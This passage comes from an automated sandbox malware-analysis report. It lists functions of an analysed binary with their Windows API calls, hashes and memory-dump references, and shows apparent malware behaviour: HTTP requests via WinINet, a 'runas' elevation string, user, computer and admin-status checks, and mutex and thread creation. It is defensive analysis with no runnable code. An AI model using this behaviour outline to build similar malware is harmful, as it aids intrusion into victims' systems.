Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: Authority$CloseNameOpenValue$AccountCountIdentifierLookupQueryUser
String ID:
API String ID: 3947990373-0
Opcode ID: b18799469565931f04c07ea31d82e33657cf6a2c722c1b21b1d5f3c8bc32a706
Instruction ID: 265e430f8a48a498ebec9a84ee6da83a599ce1712f96b9198810a1a540db1f9d
Opcode Fuzzy Hash: b18799469565931f04c07ea31d82e33657cf6a2c722c1b21b1d5f3c8bc32a706
Instruction Fuzzy Hash: 061223716101099BDB2CCF28CC84BEDBFB9EF85314F9042A8F61597285DB35AAC5CB94

Uniqueness

Uniqueness Score: -1.00%

Function 011A79AF Relevance: 15.8, APIs: 10, Instructions: 761
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET ref: 011A79E4
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 011A7A0B
HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 011A7A56
HttpSendRequestA.WININET(?,00000000,?), ref: 011A7B16
InternetReadFile.WININET(?,?,000003FF,?), ref: 011A7BBF
InternetReadFile.WININET(?,00000000,000003FF,00000000), ref: 011A7D9C
InternetCloseHandle.WININET(?), ref: 011A7DB7
InternetCloseHandle.WININET(?), ref: 011A7DBF
InternetCloseHandle.WININET(?), ref: 011A7DC7

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
String ID:
API String ID: 1354133546-0
Opcode ID: 55a61e65285cbbc11d0086220c353114eebe2b7fc3edfd2a0de45f4de9128a7f
Instruction ID: fe8b794099f17ecffc043b17bbefd17a5c23e7c83834c11f59686189f53f218e
Opcode Fuzzy Hash: 55a61e65285cbbc11d0086220c353114eebe2b7fc3edfd2a0de45f4de9128a7f
Instruction Fuzzy Hash: B2520371A001099BDB1CDF28CC94BEDBF76AF45304F948198EA19A72D1D735AAC0CB95

Uniqueness

Uniqueness Score: -1.00%

Function 011B74C1 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,011B74C0,?,?,?,?,?,011B837B), ref: 011B74E3
TerminateProcess.KERNEL32(00000000,?,011B74C0,?,?,?,?,?,011B837B), ref: 011B74EA
ExitProcess.KERNEL32 ref: 011B74FC

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: e3097d6c4cf480aba4f431e7706e50681e857645ff10619fb5080f07d862c3a3
Instruction ID: 85ee8ad52c8d8e7f8aa723b53adaf07f61f43c18d42fd393b14c7ff8704aaf86
Opcode Fuzzy Hash: e3097d6c4cf480aba4f431e7706e50681e857645ff10619fb5080f07d862c3a3
Instruction Fuzzy Hash: 43E0BF31000544AFCF2A7F58E94C9993F69EBC4645F054424F9158A1B5CB35D981CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 011C10D0 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 011C0D89: CreateFileW.KERNELBASE(00000000,00000000,?,011C1179,?,?,00000000,?,011C1179,00000000,0000000C), ref: 011C0DA6

GetLastError.KERNEL32 ref: 011C11E4
__dosmaperr.LIBCMT ref: 011C11EB
GetFileType.KERNELBASE(00000000), ref: 011C11F7
GetLastError.KERNEL32 ref: 011C1201
__dosmaperr.LIBCMT ref: 011C120A
CloseHandle.KERNEL32(00000000), ref: 011C122A
CloseHandle.KERNEL32(011BB1FE), ref: 011C1377
GetLastError.KERNEL32 ref: 011C13A9
__dosmaperr.LIBCMT ref: 011C13B0

Strings

H, xrefs: 011C1335

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 95d1a7233d88b02d1c569f6882b8e0df6188cde7e9b354dcab2a5eb7b4eeae37
Instruction ID: b9e0e40d1c6899b43682fed00373d3d1f55c718efe13dd27485ce0c9a8e7fc97
Opcode Fuzzy Hash: 95d1a7233d88b02d1c569f6882b8e0df6188cde7e9b354dcab2a5eb7b4eeae37
Instruction Fuzzy Hash: 5AA14632A04155EFCF2DDF6CD891BAE3BB1AB5A724F14019DE811EB2D2C7348952C792

Uniqueness

Uniqueness Score: -1.00%

Function 011A3DE0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 340
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 011A2BC0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 011A2D21
Part of subcall function 011A2BC0: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400,?,?,00000000,00000001,?), ref: 011A2D4F
Part of subcall function 011A2BC0: RegCloseKey.KERNELBASE(?,?,?,00000000,00000001,?), ref: 011A2D5B

Part of subcall function 011A3DE0: ShellExecuteA.SHELL32(00000000,?,?,?,00000000,00000000), ref: 011A386D

Sleep.KERNEL32(000003E8), ref: 011A3E94
SetCurrentDirectoryA.KERNEL32(?,?,?), ref: 011A4014

Strings

runas, xrefs: 011A382F

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: CloseCurrentDirectoryExecuteOpenQueryShellSleepValue
String ID: runas
API String ID: 203667995-4000483414
Opcode ID: 2dd47108497bdea0f4c53ac8c48920bcd575d2ab1022eb803e47a35e0c26b748
Instruction ID: 63b83f82a0ea1f61b7833bd7c093a950f345508dd5687f1a85c8c3ff0414b780
Opcode Fuzzy Hash: 2dd47108497bdea0f4c53ac8c48920bcd575d2ab1022eb803e47a35e0c26b748
Instruction Fuzzy Hash: 82B16571B101055BDB0CEB38CC957EDBF32AF95318FA4821CE4219B7C5EB75AA818792

Uniqueness

Uniqueness Score: -1.00%

Function 011BF398 Relevance: 4.6, APIs: 3, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 011BF3A1
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 011BF40F

Part of subcall function 011BF2B4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,011C4EB0,?,00000000,00000000), ref: 011BF356

Part of subcall function 011BB84A: RtlAllocateHeap.NTDLL(00000000,?,?,?,011BEE7B,00000220,?,?,?,?,?,?,011B837B,?), ref: 011BB87C

_free.LIBCMT ref: 011BF400

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: 1e802cc7a105291c7186a4d096e2ea70aa3c6444389d25c88ccbaaa46e1c170e
Instruction ID: f1ad8dd7b353d2c1caa4d1d350188070f68b25c784e9bacb63a494954c054662
Opcode Fuzzy Hash: 1e802cc7a105291c7186a4d096e2ea70aa3c6444389d25c88ccbaaa46e1c170e
Instruction Fuzzy Hash: 9C01DFA2A0A6133B6B2926BF5CC8CFF6C6CCAC69943150128FE00C2200EB64CD0382B1

Uniqueness

Uniqueness Score: -1.00%

Function 011B38E0 Relevance: 4.5, APIs: 3, Instructions: 37
threadsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 011A5EF0: CreateMutexA.KERNEL32(00000000,00000000,011D71A4), ref: 011A7258
Part of subcall function 011A5EF0: GetLastError.KERNEL32 ref: 011A725E

Part of subcall function 011A8470: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 011A8494

Part of subcall function 011A5610: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 011A5634

Part of subcall function 011B1180: IsUserAnAdmin.SHELL32 ref: 011B11BA
Part of subcall function 011B1180: GetUserNameA.ADVAPI32(?,00000104), ref: 011B1242
Part of subcall function 011B1180: GetComputerNameExW.KERNEL32(00000002,?,00000100,?,?), ref: 011B12A1

CreateThread.KERNEL32 ref: 011B38B6
CreateThread.KERNEL32 ref: 011B38C7
Sleep.KERNEL32(00007530), ref: 011B38D5

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: Name$Create$FileModuleThreadUser$AdminComputerErrorLastMutexSleep
String ID:
API String ID: 2986721708-0
Opcode ID: b434bc16f534c6bbd12df0be5cc4f4d714bd4273cfe771ec3b4e434cc0b806a7
Instruction ID: 652caf394a1d81bc1e0718a87a8746ca0b976c2b79df9347de281c7d503a647e
Opcode Fuzzy Hash: b434bc16f534c6bbd12df0be5cc4f4d714bd4273cfe771ec3b4e434cc0b806a7
Instruction Fuzzy Hash: FFF015B9BA471976E62C32A82C13F993D096B14B59FA10229EB293E1C15FD0356006EB

Uniqueness

Uniqueness Score: -1.00%

Function 011A8E98 Relevance: 3.4, APIs: 2, Instructions: 351
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,?), ref: 011A8EB6
GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 011A9248

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: FileModuleNamePathTemp
String ID:
API String ID: 1080798513-0
Opcode ID: eee9c12cf88d01b14c6b7c7bea4f487fbab0b6807f8cc20180c9e12a21bf9c63
Instruction ID: 817bece884d01589bfcae59859f924d99a8073b525f753eb14b23fa9764e1d42
Opcode Fuzzy Hash: eee9c12cf88d01b14c6b7c7bea4f487fbab0b6807f8cc20180c9e12a21bf9c63
Instruction Fuzzy Hash: 63C1F471A001188BEB2CDB38CC997DDBB36AF95318F9482D8D10AA73D5DB315EC58B51

Uniqueness

Uniqueness Score: -1.00%

Function 011BA2B2 Relevance: 3.1, APIs: 2, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 011BA320
_free.LIBCMT ref: 011BA340

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 95e71ed9796ed69de1a0edf8ccae4baecc2eb90976fb3f498059840cb0bf3c04
Instruction ID: 3429f99049701d08f81a4f027572a73ae65b09a8ff57a961c6cd437958cd4e4f
Opcode Fuzzy Hash: 95e71ed9796ed69de1a0edf8ccae4baecc2eb90976fb3f498059840cb0bf3c04
Instruction Fuzzy Hash: 0A41D332A052049FCB18DF69C8C0A9DB7F6EF88714F1945A8D955EB3A0D771ED01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 011C50FF Relevance: 3.0, APIs: 2, Instructions: 44
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 011C5120

Part of subcall function 011BB84A: RtlAllocateHeap.NTDLL(00000000,?,?,?,011BEE7B,00000220,?,?,?,?,?,?,011B837B,?), ref: 011BB87C

RtlReAllocateHeap.NTDLL(00000000,76686490,?,00000004,00000000,?,011BF7CD,76686490,00000004,?,?,?,?,011BA33B,?,?), ref: 011C515C

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: AllocateHeap$_free
String ID:
API String ID: 1482568997-0
Opcode ID: 86bcc5d7149888be57dbe9594fe1f96d2b244d70d6dc74e79ac31f7e73c730d2
Instruction ID: d9bd89212fbd2fc8bfa6b5d7dca6766edc832d49ba567aed11474eed2f812121
Opcode Fuzzy Hash: 86bcc5d7149888be57dbe9594fe1f96d2b244d70d6dc74e79ac31f7e73c730d2
Instruction Fuzzy Hash: BAF0FC313061167ADB6D262A9C48FAB3B5ADFF1DB4F11012DE91497191DB34E4014191

Uniqueness

Uniqueness Score: -1.00%

Function 011A8E40 Relevance: 1.6, APIs: 1, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 13cb1e52d75c015a33b769a0264a29fb7d5fffdc2e73c246f36d37177ac5b847
Instruction ID: 30a03fe26d54b18f15454cd3f246be6840bb34b0a9868077869aa310b1b9f109
Opcode Fuzzy Hash: 13cb1e52d75c015a33b769a0264a29fb7d5fffdc2e73c246f36d37177ac5b847
Instruction Fuzzy Hash: 74519C7490022D8BEB28EB24CC987EDBB71AB65308F9441D8C50D67296EB715BC9CF91

Uniqueness

Uniqueness Score: -1.00%

Function 011B3E00 Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 011B3F33

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 4e3782d3a71963dd02cca7e0b7a00c3566392b19b93ea5c8f317fc15e512d4e5
Instruction ID: 5a223dc458a8ce9995be869aacef16503abd9f9a5d1f21ae67b1b4121a8907cc
Opcode Fuzzy Hash: 4e3782d3a71963dd02cca7e0b7a00c3566392b19b93ea5c8f317fc15e512d4e5
Instruction Fuzzy Hash: 3D311471A102009BD72C9F7CD8C09AEF7E9FB55220B64072FE976C7381D77099648752

Uniqueness

Uniqueness Score: -1.00%

Function 011A8310 Relevance: 1.6, APIs: 1, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cac0fbe8914f9b1547974f1b48a731670670ea2e72f8478248987ab81525cf30
Instruction ID: f3bf0c15a1e2d93730ff7da40561595cdbce149fae98f11333bbebbec7f6eba4
Opcode Fuzzy Hash: cac0fbe8914f9b1547974f1b48a731670670ea2e72f8478248987ab81525cf30
Instruction Fuzzy Hash: 6831AC31A1110D9FDB08DF68C884BDEBFB1EF49305F64822DE805A7280E739DA94CB91

Uniqueness

Uniqueness Score: -1.00%

Function 011B513D Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___std_exception_copy.LIBVCRUNTIME ref: 011A222E

Part of subcall function 011B5C5E: RaiseException.KERNEL32(E06D7363,00000001,00000003,011A220C,?,?,?,011A220C,?,011D4BAC), ref: 011B5CBE

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID:
API String ID: 3109751735-0
Opcode ID: 4d7b9d32298f1f60ecd381c593022c24604649510bfe5d1602791d531a15612e
Instruction ID: 67e7734267642405ee2d982bc576fe64977d4845476d8946e483e817653d4b3b
Opcode Fuzzy Hash: 4d7b9d32298f1f60ecd381c593022c24604649510bfe5d1602791d531a15612e
Instruction Fuzzy Hash: 3501493580020E77CB0CFBE9EC819C9BBAE9E24618B108635EB14A7940FB70F55587D1

Uniqueness

Uniqueness Score: -1.00%

Function 011BB1BF Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsopen_s.LIBCMT ref: 011BB1F9

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 46926a188e79f900a32e60eb223befbbb1c6ec5a887ebebad621832bd031c702
Instruction ID: 04c2ff9905c5a3c93a386f4787eb9720643f93454d64ce7728a7d5f7efa1b03b
Opcode Fuzzy Hash: 46926a188e79f900a32e60eb223befbbb1c6ec5a887ebebad621832bd031c702
Instruction Fuzzy Hash: BC111871A0410AAFCB09DF58E9819DE7BF5EF48304F0440A9F805AB251D770E915CB65

Uniqueness

Uniqueness Score: -1.00%

Function 011A93C1 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(00000000,00000000), ref: 011A93CF

Part of subcall function 011A4B90: GetFileAttributesA.KERNELBASE(00000000,011A93BD,?,?), ref: 011A4B99

Part of subcall function 011A5610: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 011A5634

Part of subcall function 011A3DE0: ShellExecuteA.SHELL32(00000000,?,?,?,00000000,00000000), ref: 011A386D

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: File$AttributesCreateDirectoryExecuteModuleNameShell
String ID:
API String ID: 1542505680-0
Opcode ID: 53c901be9fe570f78af886453a34f5de4dfbcc81fb6e72d7e55d84708712fe65
Instruction ID: f13c79647e3f296ad6d891c04bcf69b90d1228fb95d45465aa3f0f4ce5990d86
Opcode Fuzzy Hash: 53c901be9fe570f78af886453a34f5de4dfbcc81fb6e72d7e55d84708712fe65
Instruction Fuzzy Hash: E4F0C879E1020957CD1CF779CD567EC7E286FA1258FC00488D916A76C1EF304B654AE3

Uniqueness

Uniqueness Score: -1.00%

Function 011BCA64 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 011BE268: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,011BBDF4,00000001,00000364,00000006,000000FF,?,?,011B8315,011BB387,?,?,011BA493), ref: 011BE2A9

_free.LIBCMT ref: 011BCAD3

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: d938a914315be29e425c64607db0c83adb87f39014ef6c29a610810cf758c32f
Instruction ID: bc484e2d177750a9bdf23f3db1de1df699655b3bc65aef808cf2be050ca4c572
Opcode Fuzzy Hash: d938a914315be29e425c64607db0c83adb87f39014ef6c29a610810cf758c32f
Instruction Fuzzy Hash: 310122726043566BD329CFA8C8C0ADAFB98EB053B0F010769E545B7AC0E3706C10CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 011C1042 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 011C10A5

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473167943.00000000011D6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473178704.00000000011D9000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11a0000_g6604988.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 33d5afa7efe1ffb2da5aff40c16c1ad0bae316e50f624f00eab5aaca7dff4ac3
Instruction ID: 1b3da7c1a65a079d9bde502bbec5d9d9cdaa092801c7aff4ef845e03c104944e
Opcode Fuzzy Hash: 33d5afa7efe1ffb2da5aff40c16c1ad0bae316e50f624f00eab5aaca7dff4ac3
Instruction Fuzzy Hash: 6C014F72D0015AFFCF05AFA88C01AEE7FB5AF18214F144169FA14E21A1E7318A20DB91

Uniqueness

Uniqueness Score: -1.00%

Function 011BE268 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,011BBDF4,00000001,00000364,00000006,000000FF,?,?,011B8315,011BB387,?,?,011BA493), ref: 011BE2A9

Memory Dump Source

Source File: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 011A0000, based on PE: true

Associated: 00000007.00000002.473067644.00000000011A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmpDownload File
